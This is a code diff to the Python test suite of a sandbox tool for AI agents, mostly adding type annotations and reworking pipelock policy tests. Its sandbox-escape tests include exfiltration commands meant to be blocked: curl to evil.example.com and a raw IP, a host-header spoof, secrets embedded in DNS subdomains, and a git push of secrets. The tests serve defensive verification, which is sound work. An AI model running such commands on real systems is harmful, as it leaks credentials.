@@ -195,10 +195,10 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
except BaseException:
|
||||
pass
|
||||
cls._identity = ""
|
||||
if cls._stage_dir is not None:
|
||||
if cls._stage_dir is not None: # type: ignore
|
||||
shutil.rmtree(cls._stage_dir, ignore_errors=True)
|
||||
cls._stage_dir = None # type: ignore[assignment]
|
||||
if cls._key_path is not None:
|
||||
if cls._key_path is not None: # type: ignore
|
||||
try:
|
||||
cls._key_path.unlink()
|
||||
except OSError:
|
||||
@@ -212,7 +212,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
`bottle.egress.routes` (only api.anthropic.com is). Pipelock
|
||||
or egress should reject the request with a non-200 response,
|
||||
and the actual upstream's content must not appear in stdout."""
|
||||
r = self._bottle.exec(
|
||||
r = self._bottle.exec( # type: ignore
|
||||
'curl --silent --show-error --max-time 8 --fail '
|
||||
'https://evil.example.com/'
|
||||
)
|
||||
@@ -232,7 +232,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
hostname to a non-allowlisted IP. Pipelock should
|
||||
not honor the spoof (it does its own resolution)."""
|
||||
with self.subTest(attack="direct IP"):
|
||||
r = self._bottle.exec(
|
||||
r = self._bottle.exec( # type: ignore
|
||||
'curl --silent --show-error --max-time 8 --fail '
|
||||
'https://198.51.100.1/'
|
||||
)
|
||||
@@ -243,7 +243,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
)
|
||||
|
||||
with self.subTest(attack="host-header spoof"):
|
||||
r = self._bottle.exec(
|
||||
r = self._bottle.exec( # type: ignore
|
||||
'curl --silent --show-error --max-time 8 --fail '
|
||||
'--resolve api.anthropic.com:443:198.51.100.1 '
|
||||
'https://api.anthropic.com/'
|
||||
@@ -265,13 +265,13 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
# `"blocked: request body contains secret"`).
|
||||
_SANDBOX_BLOCK_MARKERS = ("egress:", "pipelock", "blocked:")
|
||||
|
||||
def _assert_sandbox_block(self, label: str, r) -> None:
|
||||
def _assert_sandbox_block(self, label: str, r: object) -> None: # type: ignore
|
||||
"""A real sandbox block produces an HTTP 403 with a
|
||||
recognizable sandbox sidecar marker in the body. ANY
|
||||
other outcome (200 from upstream, 401/404 from upstream,
|
||||
non-marker 5xx) means the request escaped — the secret
|
||||
reached the network."""
|
||||
body_and_code = (r.stdout or "").strip()
|
||||
body_and_code = (r.stdout or "").strip() # type: ignore
|
||||
# The curl invocation appends `\nHTTP_CODE:%{http_code}` so
|
||||
# we can disambiguate. Split that off.
|
||||
http_code = ""
|
||||
@@ -281,7 +281,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
body, _, http_code = body_and_code.rpartition(marker)
|
||||
http_code = http_code.strip()
|
||||
body = body.rstrip()
|
||||
haystack = (body + " " + (r.stderr or "")).lower()
|
||||
haystack = (body + " " + (r.stderr or "")).lower() # type: ignore
|
||||
has_marker = any(m in haystack for m in self._SANDBOX_BLOCK_MARKERS)
|
||||
self.assertTrue(
|
||||
has_marker and http_code == "403",
|
||||
@@ -290,7 +290,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
f"If the response came from the actual upstream, the "
|
||||
f"secret REACHED the network — that's the leak this "
|
||||
f"test exists to catch. body={body!r} "
|
||||
f"stderr={(r.stderr or '').strip()!r}",
|
||||
f"stderr={(r.stderr or '').strip()!r}", # type: ignore
|
||||
)
|
||||
|
||||
def test_3_http_exfil_blocked(self) -> None:
|
||||
@@ -343,9 +343,9 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
f'-H "X-Custom: $TEST_SECRET_ANTHROPIC"',
|
||||
),
|
||||
]
|
||||
for name, cmd in shapes:
|
||||
for name, cmd in shapes: # type: ignore
|
||||
with self.subTest(shape=name):
|
||||
r = self._bottle.exec(cmd)
|
||||
r = self._bottle.exec(cmd) # type: ignore
|
||||
self._assert_sandbox_block(name, r)
|
||||
|
||||
# ---- attack 4: DNS exfil -----------------------------------------
|
||||
@@ -365,7 +365,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
intact (PRD 0022 Q2)."""
|
||||
|
||||
with self.subTest(attack="crafted subdomain"):
|
||||
r = self._bottle.exec(
|
||||
r = self._bottle.exec( # type: ignore
|
||||
'curl --silent --show-error --max-time 8 --fail '
|
||||
'"https://$TEST_SECRET_GENERIC.api.anthropic.com/"'
|
||||
)
|
||||
@@ -379,7 +379,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
# `+short +tries=1 +time=3`: no debug output, one attempt,
|
||||
# 3s timeout. Outside the internal network has no path;
|
||||
# dig should fail or return empty.
|
||||
r = self._bottle.exec(
|
||||
r = self._bottle.exec( # type: ignore
|
||||
'dig +short +tries=1 +time=3 @8.8.8.8 '
|
||||
'"$TEST_SECRET_GENERIC.example.com" '
|
||||
'; echo "EXIT=$?"'
|
||||
@@ -431,7 +431,7 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
with self.subTest(secret=name):
|
||||
# Fresh repo per shape so prior commits don't
|
||||
# confuse gitleaks's diff. -rm -rf is best-effort.
|
||||
script = (
|
||||
script = ( # type: ignore
|
||||
'set -eu\n'
|
||||
'cd /tmp\n'
|
||||
'rm -rf sandbox-escape-repo\n'
|
||||
@@ -446,8 +446,8 @@ class TestSandboxEscape(unittest.TestCase):
|
||||
f'git remote add origin {upstream_url}\n'
|
||||
'git push origin HEAD:refs/heads/master 2>&1\n'
|
||||
)
|
||||
r = self._bottle.exec(script)
|
||||
combined = (r.stderr + r.stdout).lower()
|
||||
r = self._bottle.exec(script) # type: ignore
|
||||
combined = (r.stderr + r.stdout).lower() # type: ignore
|
||||
|
||||
self.assertNotEqual(
|
||||
0, r.returncode,
|
||||
|
||||
@@ -16,7 +16,7 @@ from bot_bottle.egress import CODEX_HOST_CREDENTIAL_TOKEN_REF
|
||||
|
||||
|
||||
def _jwt(exp: int) -> str:
|
||||
def enc(obj: dict) -> str:
|
||||
def enc(obj: dict[str, object]) -> str: # type: ignore
|
||||
raw = json.dumps(obj, separators=(",", ":")).encode()
|
||||
return base64.urlsafe_b64encode(raw).decode().rstrip("=")
|
||||
return f"{enc({'alg': 'none'})}.{enc({'exp': exp})}.sig"
|
||||
|
||||
@@ -175,9 +175,9 @@ class TestExecUserSwitching(unittest.TestCase):
|
||||
class TestExecResultParity(unittest.TestCase):
|
||||
"""Both backends return ExecResult with returncode, stdout, stderr."""
|
||||
|
||||
def _stub_run(self, argv, **kwargs):
|
||||
def _stub_run(self, argv: object, **kwargs: object) -> object: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
argv, 0, stdout="out\n", stderr="err\n",
|
||||
argv, 0, stdout="out\n", stderr="err\n", # type: ignore
|
||||
)
|
||||
|
||||
def test_docker_exec_result_shape(self):
|
||||
|
||||
@@ -65,7 +65,7 @@ class TestEnumerateActiveAgents(unittest.TestCase):
|
||||
)
|
||||
|
||||
class _FakeBackend:
|
||||
def __init__(self, items, available=True):
|
||||
def __init__(self, items: object, available: object = True) -> None: # type: ignore
|
||||
self._items = items
|
||||
self._available = available
|
||||
|
||||
@@ -100,13 +100,13 @@ class TestEnumerateActiveAgents(unittest.TestCase):
|
||||
)
|
||||
|
||||
class _FakeBackend:
|
||||
def __init__(self, items):
|
||||
def __init__(self, items: object) -> None: # type: ignore
|
||||
self._items = items
|
||||
|
||||
def is_available(self):
|
||||
def is_available(self) -> bool:
|
||||
return True
|
||||
|
||||
def enumerate_active(self):
|
||||
def enumerate_active(self) -> object:
|
||||
return self._items
|
||||
|
||||
with patch.object(
|
||||
@@ -150,11 +150,11 @@ class TestEnumerateActiveAgents(unittest.TestCase):
|
||||
)
|
||||
|
||||
class _FakeBackend:
|
||||
def __init__(self, items, available):
|
||||
def __init__(self, items: object, available: object) -> None: # type: ignore
|
||||
self._items = items
|
||||
self._available = available
|
||||
|
||||
def is_available(self):
|
||||
def is_available(self) -> object:
|
||||
return self._available
|
||||
|
||||
def enumerate_active(self):
|
||||
|
||||
@@ -67,13 +67,13 @@ class TestApplyCapabilityChange(_FakeHomeMixin, unittest.TestCase):
|
||||
self._orig_push = capability_apply._push_working_tree
|
||||
self._orig_teardown = capability_apply._teardown_bottle
|
||||
|
||||
def stub_snapshot(slug):
|
||||
def stub_snapshot(slug: object) -> None: # type: ignore
|
||||
self._calls.append(f"snapshot:{slug}")
|
||||
|
||||
def stub_push(slug):
|
||||
def stub_push(slug: object) -> None: # type: ignore
|
||||
self._calls.append(f"push:{slug}")
|
||||
|
||||
def stub_teardown(slug):
|
||||
def stub_teardown(slug: object) -> None: # type: ignore
|
||||
self._calls.append(f"teardown:{slug}")
|
||||
|
||||
capability_apply.snapshot_transcript = stub_snapshot # type: ignore[assignment]
|
||||
|
||||
@@ -31,7 +31,7 @@ class TestCmdCleanup(unittest.TestCase):
|
||||
return_value=("docker", "smolmachines"),
|
||||
), patch.object(
|
||||
cmd, "get_bottle_backend",
|
||||
side_effect=lambda name: backends_by_name[name],
|
||||
side_effect=lambda name: backends_by_name[name], # type: ignore
|
||||
), patch.object(
|
||||
cmd, "_prompt_yes", return_value=True,
|
||||
):
|
||||
@@ -52,7 +52,7 @@ class TestCmdCleanup(unittest.TestCase):
|
||||
return_value=("docker", "smolmachines"),
|
||||
), patch.object(
|
||||
cmd, "get_bottle_backend",
|
||||
side_effect=lambda name: backends_by_name[name],
|
||||
side_effect=lambda name: backends_by_name[name], # type: ignore
|
||||
), patch.object(
|
||||
cmd, "_prompt_yes",
|
||||
) as prompt:
|
||||
@@ -71,7 +71,7 @@ class TestCmdCleanup(unittest.TestCase):
|
||||
return_value=("docker", "smolmachines"),
|
||||
), patch.object(
|
||||
cmd, "get_bottle_backend",
|
||||
side_effect=lambda name: backends_by_name[name],
|
||||
side_effect=lambda name: backends_by_name[name], # type: ignore
|
||||
), patch.object(
|
||||
cmd, "_prompt_yes", return_value=False,
|
||||
):
|
||||
@@ -91,7 +91,7 @@ class TestCmdCleanup(unittest.TestCase):
|
||||
return_value=("docker", "smolmachines"),
|
||||
), patch.object(
|
||||
cmd, "get_bottle_backend",
|
||||
side_effect=lambda name: backends_by_name[name],
|
||||
side_effect=lambda name: backends_by_name[name], # type: ignore
|
||||
), patch.object(
|
||||
cmd, "_prompt_yes", return_value=True,
|
||||
):
|
||||
|
||||
@@ -36,7 +36,7 @@ class TestCaptureSessionState(_FakeHomeMixin, unittest.TestCase):
|
||||
# covers the real docker cp path.
|
||||
self._snap_calls: list[str] = []
|
||||
self._orig_snap = start_mod.snapshot_transcript
|
||||
start_mod.snapshot_transcript = lambda identity: (
|
||||
start_mod.snapshot_transcript = lambda identity: ( # type: ignore
|
||||
self._snap_calls.append(identity)
|
||||
)
|
||||
|
||||
|
||||
@@ -21,14 +21,14 @@ def _jwt(exp: int) -> str:
|
||||
return _jwt_with_payload({"exp": exp})
|
||||
|
||||
|
||||
def _jwt_with_payload(payload: dict) -> str:
|
||||
def enc(obj: dict) -> str:
|
||||
def _jwt_with_payload(payload: dict[str, object]) -> str: # type: ignore
|
||||
def enc(obj: dict[str, object]) -> str: # type: ignore
|
||||
raw = json.dumps(obj, separators=(",", ":")).encode()
|
||||
return base64.urlsafe_b64encode(raw).decode().rstrip("=")
|
||||
return f"{enc({'alg': 'none'})}.{enc(payload)}.sig"
|
||||
|
||||
|
||||
def _jwt_payload(token: str) -> dict:
|
||||
def _jwt_payload(token: str) -> dict[str, object]: # type: ignore
|
||||
payload = token.split(".")[1]
|
||||
payload += "=" * (-len(payload) % 4)
|
||||
return json.loads(base64.urlsafe_b64decode(payload.encode()).decode())
|
||||
@@ -43,7 +43,7 @@ class TestCodexHostAccessToken(unittest.TestCase):
|
||||
def tearDown(self):
|
||||
self.tmp.cleanup()
|
||||
|
||||
def _write(self, payload: dict) -> None:
|
||||
def _write(self, payload: dict[str, object]) -> None: # type: ignore
|
||||
self.auth_path.write_text(json.dumps(payload))
|
||||
|
||||
def test_auth_path_uses_codex_home(self):
|
||||
@@ -210,11 +210,11 @@ class TestCodexHostAccessToken(unittest.TestCase):
|
||||
access_payload = _jwt_payload(dummy["tokens"]["access_token"])
|
||||
auth = access_payload["https://api.openai.com/auth"]
|
||||
profile = access_payload["https://api.openai.com/profile"]
|
||||
self.assertEqual("plus", auth["chatgpt_plan_type"])
|
||||
self.assertEqual("acct-real", auth["chatgpt_account_id"])
|
||||
self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"])
|
||||
self.assertEqual("bot-bottle@example.invalid", profile["email"])
|
||||
self.assertTrue(profile["email_verified"])
|
||||
self.assertEqual("plus", auth["chatgpt_plan_type"]) # type: ignore
|
||||
self.assertEqual("acct-real", auth["chatgpt_account_id"]) # type: ignore
|
||||
self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"]) # type: ignore
|
||||
self.assertEqual("bot-bottle@example.invalid", profile["email"]) # type: ignore
|
||||
self.assertTrue(profile["email_verified"]) # type: ignore
|
||||
|
||||
def test_dummy_auth_redacts_unknown_future_auth_fields(self):
|
||||
secrets = [
|
||||
@@ -289,8 +289,8 @@ class TestCodexHostAccessToken(unittest.TestCase):
|
||||
self.assertEqual({}, access_payload["future_nested"])
|
||||
self.assertEqual([], access_payload["future_list"])
|
||||
auth = access_payload["https://api.openai.com/auth"]
|
||||
self.assertEqual("bot-bottle-placeholder", auth["session_context"])
|
||||
self.assertEqual({}, auth["nested"])
|
||||
self.assertEqual("bot-bottle-placeholder", auth["session_context"]) # type: ignore
|
||||
self.assertEqual({}, auth["nested"]) # type: ignore
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -12,6 +12,7 @@ from __future__ import annotations
|
||||
import subprocess
|
||||
import unittest
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from unittest import mock
|
||||
|
||||
from bot_bottle.agent_provider import AgentProvisionPlan
|
||||
@@ -45,7 +46,7 @@ def _manifest(*, supervise: bool, with_git: bool, with_egress: bool) -> Manifest
|
||||
"""Minimal manifest with the toggles the chunk-1 matrix needs.
|
||||
The renderer only reads from the plan, not the manifest, so this
|
||||
is just here to back BottleSpec."""
|
||||
bottle: dict = {}
|
||||
bottle: dict[str, object] = {}
|
||||
if supervise:
|
||||
bottle["supervise"] = True
|
||||
if with_git:
|
||||
@@ -271,13 +272,13 @@ class TestAgentAlwaysPresent(unittest.TestCase):
|
||||
dockerfile="",
|
||||
guest_env={"CODEX_HOME": "/home/node/.codex"},
|
||||
)
|
||||
plan = type(plan)(**{**vars(plan), "agent_provision": provision})
|
||||
plan = type(plan)(**{**vars(plan), "agent_provision": provision}) # type: ignore
|
||||
s = bottle_plan_to_compose(plan)["services"]["agent"]
|
||||
self.assertIn("CODEX_HOME=/home/node/.codex", s["environment"])
|
||||
|
||||
def test_agent_runsc_runtime(self):
|
||||
plan = _plan()
|
||||
plan = type(plan)(**{**vars(plan), "use_runsc": True})
|
||||
plan = type(plan)(**{**vars(plan), "use_runsc": True}) # type: ignore
|
||||
s = bottle_plan_to_compose(plan)["services"]["agent"]
|
||||
self.assertEqual("runsc", s["runtime"])
|
||||
|
||||
@@ -309,8 +310,8 @@ class TestSidecarBundleShape(unittest.TestCase):
|
||||
+ supervise). PRD 0024 chunk 5 dropped the legacy four-sidecar
|
||||
shape entirely, so the bundle is the only thing exercised here."""
|
||||
|
||||
def _render(self, **plan_kwargs):
|
||||
return bottle_plan_to_compose(_plan(**plan_kwargs))
|
||||
def _render(self, **plan_kwargs: object) -> Any: # type: ignore
|
||||
return bottle_plan_to_compose(_plan(**plan_kwargs)) # type: ignore
|
||||
|
||||
def test_emits_two_services_minimal(self):
|
||||
spec = self._render()
|
||||
|
||||
@@ -52,7 +52,7 @@ def _plan(
|
||||
agent_provision: AgentProvisionPlan | None = None,
|
||||
supervise: bool = False,
|
||||
) -> DockerBottlePlan:
|
||||
bottle_json: dict = {"agent_provider": {"template": "claude"}}
|
||||
bottle_json: dict = {"agent_provider": {"template": "claude"}} # type: ignore
|
||||
if supervise:
|
||||
bottle_json["supervise"] = True
|
||||
manifest = Manifest.from_json_obj({
|
||||
@@ -165,7 +165,7 @@ class TestClaudeProvisionSkills(unittest.TestCase):
|
||||
bottle = _make_bottle()
|
||||
with patch(
|
||||
"bot_bottle.backend.util.host_skill_dir",
|
||||
side_effect=lambda n: f"/host/skills/{n}",
|
||||
side_effect=lambda n: f"/host/skills/{n}", # type: ignore
|
||||
), patch(
|
||||
"bot_bottle.contrib.claude.agent_provider.os.path.isdir",
|
||||
return_value=True,
|
||||
@@ -191,7 +191,7 @@ class TestClaudeProvisionSkills(unittest.TestCase):
|
||||
bottle = _make_bottle()
|
||||
with patch(
|
||||
"bot_bottle.backend.util.host_skill_dir",
|
||||
side_effect=lambda n: f"/host/skills/{n}",
|
||||
side_effect=lambda n: f"/host/skills/{n}", # type: ignore
|
||||
), patch(
|
||||
"bot_bottle.contrib.claude.agent_provider.os.path.isdir",
|
||||
return_value=False,
|
||||
|
||||
@@ -53,7 +53,7 @@ def _plan(
|
||||
agent_provision: AgentProvisionPlan | None = None,
|
||||
supervise: bool = False,
|
||||
) -> DockerBottlePlan:
|
||||
bottle_json: dict = {"agent_provider": {"template": "codex"}}
|
||||
bottle_json: dict = {"agent_provider": {"template": "codex"}} # type: ignore
|
||||
if supervise:
|
||||
bottle_json["supervise"] = True
|
||||
manifest = Manifest.from_json_obj({
|
||||
@@ -153,7 +153,7 @@ class TestCodexProvisionSkills(unittest.TestCase):
|
||||
bottle = _make_bottle()
|
||||
with patch(
|
||||
"bot_bottle.backend.util.host_skill_dir",
|
||||
side_effect=lambda n: f"/host/skills/{n}",
|
||||
side_effect=lambda n: f"/host/skills/{n}", # type: ignore
|
||||
), patch(
|
||||
"bot_bottle.contrib.codex.agent_provider.os.path.isdir",
|
||||
return_value=True,
|
||||
|
||||
@@ -20,11 +20,11 @@ def _provisioner() -> GiteaDeployKeyProvisioner:
|
||||
)
|
||||
|
||||
|
||||
def _urlopen_response(body: dict, status: int = 200) -> MagicMock:
|
||||
def _urlopen_response(body: dict, status: int = 200) -> MagicMock: # type: ignore
|
||||
resp = MagicMock()
|
||||
resp.read.return_value = json.dumps(body).encode()
|
||||
resp.status = status
|
||||
resp.__enter__ = lambda s: s
|
||||
resp.__enter__ = lambda s: s # type: ignore
|
||||
resp.__exit__ = MagicMock(return_value=False)
|
||||
return resp
|
||||
|
||||
|
||||
@@ -99,7 +99,7 @@ class TestEnumerateActive(_FakeHomeMixin, unittest.TestCase):
|
||||
self._teardown_fake_home()
|
||||
|
||||
def _stub(self, slugs: list[str], services_by_project: dict[str, set[str]]) -> None:
|
||||
_enumerate.list_active_slugs = lambda **_: slugs
|
||||
_enumerate.list_active_slugs = lambda **_: slugs # type: ignore
|
||||
_enumerate._query_services_by_project = lambda: services_by_project
|
||||
|
||||
def test_no_active_slugs_returns_empty(self):
|
||||
|
||||
@@ -24,11 +24,11 @@ from bot_bottle.pipelock import PipelockProxyPlan
|
||||
from bot_bottle.workspace import workspace_plan
|
||||
|
||||
|
||||
def _plan(*, git_user: dict | None = None,
|
||||
def _plan(*, git_user: dict | None = None, # type: ignore
|
||||
copy_cwd: bool = False,
|
||||
user_cwd: str = "/tmp/x",
|
||||
stage_dir: Path | None = None) -> DockerBottlePlan:
|
||||
bottle_json: dict = {}
|
||||
bottle_json: dict = {} # type: ignore
|
||||
if git_user is not None:
|
||||
bottle_json["git-gate"] = {"user": git_user}
|
||||
manifest = Manifest.from_json_obj({
|
||||
|
||||
@@ -17,13 +17,13 @@ from bot_bottle.backend.docker import util as docker_mod
|
||||
from bot_bottle.workspace import WorkspacePlan
|
||||
|
||||
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=0, stdout=stdout, stderr=stderr,
|
||||
)
|
||||
|
||||
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=1, stdout="", stderr=stderr,
|
||||
)
|
||||
@@ -110,7 +110,7 @@ class TestBuildImageWithCwd(unittest.TestCase):
|
||||
workdir="/guest/home/workspace",
|
||||
)
|
||||
|
||||
def inspect_context(*args, **kwargs):
|
||||
def inspect_context(*args, **kwargs): # type: ignore
|
||||
context = Path(args[0][-1])
|
||||
staged = context / "workspace"
|
||||
self.assertTrue((staged / ".gitignore").is_file())
|
||||
|
||||
@@ -17,7 +17,7 @@ from bot_bottle.manifest import Manifest
|
||||
from bot_bottle.yaml_subset import parse_yaml_subset
|
||||
|
||||
|
||||
def _bottle(routes):
|
||||
def _bottle(routes): # type: ignore
|
||||
return Manifest.from_json_obj({
|
||||
"bottles": {"dev": {"egress": {"routes": routes}}},
|
||||
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
|
||||
@@ -257,8 +257,8 @@ class TestRenderRoutes(unittest.TestCase):
|
||||
will see, not the textual layout."""
|
||||
|
||||
@staticmethod
|
||||
def _parsed(routes) -> list[dict]:
|
||||
return parse_yaml_subset(egress_render_routes(routes))["routes"]
|
||||
def _parsed(routes) -> list[dict]: # type: ignore
|
||||
return parse_yaml_subset(egress_render_routes(routes))["routes"] # type: ignore
|
||||
|
||||
def test_authenticated_route_serialised_with_auth_fields(self):
|
||||
b = _bottle([{
|
||||
|
||||
@@ -159,7 +159,7 @@ class TestMatchRoute(unittest.TestCase):
|
||||
def test_exact_match(self):
|
||||
r = match_route(self.ROUTES, "api.github.com")
|
||||
self.assertIsNotNone(r)
|
||||
self.assertEqual("api.github.com", r.host)
|
||||
self.assertEqual("api.github.com", r.host) # type: ignore
|
||||
|
||||
def test_case_insensitive(self):
|
||||
# DNS hostnames are case-insensitive per RFC 1035; mitmproxy
|
||||
@@ -167,7 +167,7 @@ class TestMatchRoute(unittest.TestCase):
|
||||
# uppercase. Lookup must normalise.
|
||||
r = match_route(self.ROUTES, "API.GitHub.COM")
|
||||
self.assertIsNotNone(r)
|
||||
self.assertEqual("api.github.com", r.host)
|
||||
self.assertEqual("api.github.com", r.host) # type: ignore
|
||||
|
||||
def test_no_match_returns_none(self):
|
||||
self.assertIsNone(match_route(self.ROUTES, "elsewhere.example"))
|
||||
@@ -370,7 +370,7 @@ class TestGitPushBlockFailFast(unittest.TestCase):
|
||||
self.send_header("Content-Length", "0")
|
||||
self.end_headers()
|
||||
|
||||
def log_message(self, _fmt, *_args):
|
||||
def log_message(self, _fmt, *_args): # type: ignore
|
||||
pass
|
||||
|
||||
server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Handler)
|
||||
|
||||
@@ -21,10 +21,10 @@ _ROUTES_EMPTY = "routes: []\n"
|
||||
_ROUTES_ONE = 'routes:\n - host: "api.anthropic.com"\n'
|
||||
|
||||
|
||||
def _routes(parsed: str) -> list[dict]:
|
||||
def _routes(parsed: str) -> list[dict]: # type: ignore
|
||||
"""Parse a YAML routes string and pull out the routes list, so
|
||||
tests can assert on shape directly."""
|
||||
return parse_yaml_subset(parsed)["routes"]
|
||||
return parse_yaml_subset(parsed)["routes"] # type: ignore
|
||||
|
||||
|
||||
class TestValidateRoutesContent(unittest.TestCase):
|
||||
|
||||
@@ -189,7 +189,7 @@ class TestGitHttpBackend(unittest.TestCase):
|
||||
try:
|
||||
urllib.request.urlopen(req, timeout=5)
|
||||
self.fail("expected HTTPError 403")
|
||||
except urllib.error.HTTPError as e:
|
||||
except urllib.error.HTTPError as e: # type: ignore
|
||||
self.assertEqual(403, e.code)
|
||||
self.assertIn(b"upstream fetch failed", e.read())
|
||||
|
||||
@@ -234,7 +234,7 @@ class TestGitHttpBackend(unittest.TestCase):
|
||||
try:
|
||||
urllib.request.urlopen(req, timeout=5)
|
||||
self.fail("expected HTTPError 403")
|
||||
except urllib.error.HTTPError as e:
|
||||
except urllib.error.HTTPError as e: # type: ignore
|
||||
self.assertEqual(403, e.code)
|
||||
|
||||
logged = buf.getvalue()
|
||||
@@ -291,7 +291,7 @@ class TestContentLengthBounds(unittest.TestCase):
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=3) as resp:
|
||||
return resp.status
|
||||
except urllib.error.HTTPError as e:
|
||||
except urllib.error.HTTPError as e: # type: ignore
|
||||
return e.code
|
||||
|
||||
def test_non_numeric_content_length_returns_400(self):
|
||||
|
||||
@@ -22,7 +22,7 @@ from pathlib import Path
|
||||
from bot_bottle.manifest import ManifestError, Manifest
|
||||
|
||||
|
||||
def _error_message(callable_, *args, **kwargs) -> str:
|
||||
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
|
||||
"""Run `callable_` expecting a ManifestError; return its message."""
|
||||
try:
|
||||
callable_(*args, **kwargs)
|
||||
@@ -31,11 +31,11 @@ def _error_message(callable_, *args, **kwargs) -> str:
|
||||
raise AssertionError("expected ManifestError was not raised")
|
||||
|
||||
|
||||
def _manifest(*, bottle_user=None, agent_git=None) -> Manifest:
|
||||
bottle: dict = {}
|
||||
def _manifest(*, bottle_user=None, agent_git=None) -> Manifest: # type: ignore
|
||||
bottle: dict = {} # type: ignore
|
||||
if bottle_user is not None:
|
||||
bottle = {"git-gate": {"user": bottle_user}}
|
||||
agent: dict = {"skills": [], "prompt": "", "bottle": "dev"}
|
||||
agent: dict = {"skills": [], "prompt": "", "bottle": "dev"} # type: ignore
|
||||
if agent_git is not None:
|
||||
agent["git-gate"] = agent_git
|
||||
return Manifest.from_json_obj({
|
||||
|
||||
@@ -10,14 +10,14 @@ import unittest
|
||||
from bot_bottle.manifest import ManifestError, Manifest
|
||||
|
||||
|
||||
def _bottle(routes):
|
||||
def _bottle(routes): # type: ignore
|
||||
return Manifest.from_json_obj({
|
||||
"bottles": {"dev": {"egress": {"routes": routes}}},
|
||||
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
|
||||
}).bottles["dev"]
|
||||
|
||||
|
||||
def _provider_bottle(provider, routes):
|
||||
def _provider_bottle(provider, routes): # type: ignore
|
||||
return Manifest.from_json_obj({
|
||||
"bottles": {
|
||||
"dev": {
|
||||
@@ -29,7 +29,7 @@ def _provider_bottle(provider, routes):
|
||||
}).bottles["dev"]
|
||||
|
||||
|
||||
def _provider_config_bottle(agent_provider):
|
||||
def _provider_config_bottle(agent_provider): # type: ignore
|
||||
return Manifest.from_json_obj({
|
||||
"bottles": {"dev": {"agent_provider": agent_provider}},
|
||||
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
|
||||
@@ -225,7 +225,7 @@ class TestPipelockPolicy(unittest.TestCase):
|
||||
"host": "api.openai.com",
|
||||
"pipelock": {"tls_passthrough": True},
|
||||
}])
|
||||
self.assertTrue(b.egress.routes[0].Pipelock.TlsPassthrough)
|
||||
self.assertTrue(b.egress.routes[0].Pipelock.Config["tls_passthrough"])
|
||||
|
||||
def test_ssrf_ip_allowlist_route_policy(self):
|
||||
b = _bottle([{
|
||||
@@ -233,44 +233,28 @@ class TestPipelockPolicy(unittest.TestCase):
|
||||
"pipelock": {"ssrf_ip_allowlist": ["100.78.141.42/32"]},
|
||||
}])
|
||||
self.assertEqual(
|
||||
("100.78.141.42/32",),
|
||||
b.egress.routes[0].Pipelock.SsrfIpAllowlist,
|
||||
["100.78.141.42/32"],
|
||||
b.egress.routes[0].Pipelock.Config["ssrf_ip_allowlist"],
|
||||
)
|
||||
|
||||
def test_tls_passthrough_defaults_false(self):
|
||||
def test_skip_scan_for_extensions_route_policy(self):
|
||||
b = _bottle([{
|
||||
"host": "files.pythonhosted.org",
|
||||
"pipelock": {"skip_scan_for_extensions": [".whl", ".tar.gz"]},
|
||||
}])
|
||||
self.assertEqual(
|
||||
[".whl", ".tar.gz"],
|
||||
b.egress.routes[0].Pipelock.Config["skip_scan_for_extensions"],
|
||||
)
|
||||
|
||||
def test_empty_config_when_pipelock_omitted(self):
|
||||
b = _bottle([{"host": "api.openai.com"}])
|
||||
self.assertFalse(b.egress.routes[0].Pipelock.TlsPassthrough)
|
||||
self.assertEqual((), b.egress.routes[0].Pipelock.SsrfIpAllowlist)
|
||||
self.assertEqual({}, b.egress.routes[0].Pipelock.Config)
|
||||
|
||||
def test_pipelock_policy_must_be_object(self):
|
||||
with self.assertRaises(ManifestError):
|
||||
_bottle([{"host": "x.example", "pipelock": True}])
|
||||
|
||||
def test_tls_passthrough_must_be_bool(self):
|
||||
with self.assertRaises(ManifestError):
|
||||
_bottle([{
|
||||
"host": "x.example",
|
||||
"pipelock": {"tls_passthrough": "yes"},
|
||||
}])
|
||||
|
||||
def test_ssrf_ip_allowlist_must_be_array(self):
|
||||
with self.assertRaises(ManifestError):
|
||||
_bottle([{
|
||||
"host": "x.example",
|
||||
"pipelock": {"ssrf_ip_allowlist": "100.78.141.42/32"},
|
||||
}])
|
||||
|
||||
def test_ssrf_ip_allowlist_items_must_be_cidr_or_ip(self):
|
||||
with self.assertRaises(ManifestError):
|
||||
_bottle([{
|
||||
"host": "x.example",
|
||||
"pipelock": {"ssrf_ip_allowlist": ["not-an-ip"]},
|
||||
}])
|
||||
|
||||
def test_unknown_pipelock_key_rejected(self):
|
||||
with self.assertRaises(ManifestError):
|
||||
_bottle([{"host": "x.example", "pipelock": {"wat": True}}])
|
||||
|
||||
|
||||
class TestRouteValidation(unittest.TestCase):
|
||||
def test_duplicate_hosts_rejected(self):
|
||||
|
||||
@@ -15,7 +15,7 @@ import unittest
|
||||
from bot_bottle.manifest import ManifestError, Manifest
|
||||
|
||||
|
||||
def _error_message(callable_, *args, **kwargs) -> str:
|
||||
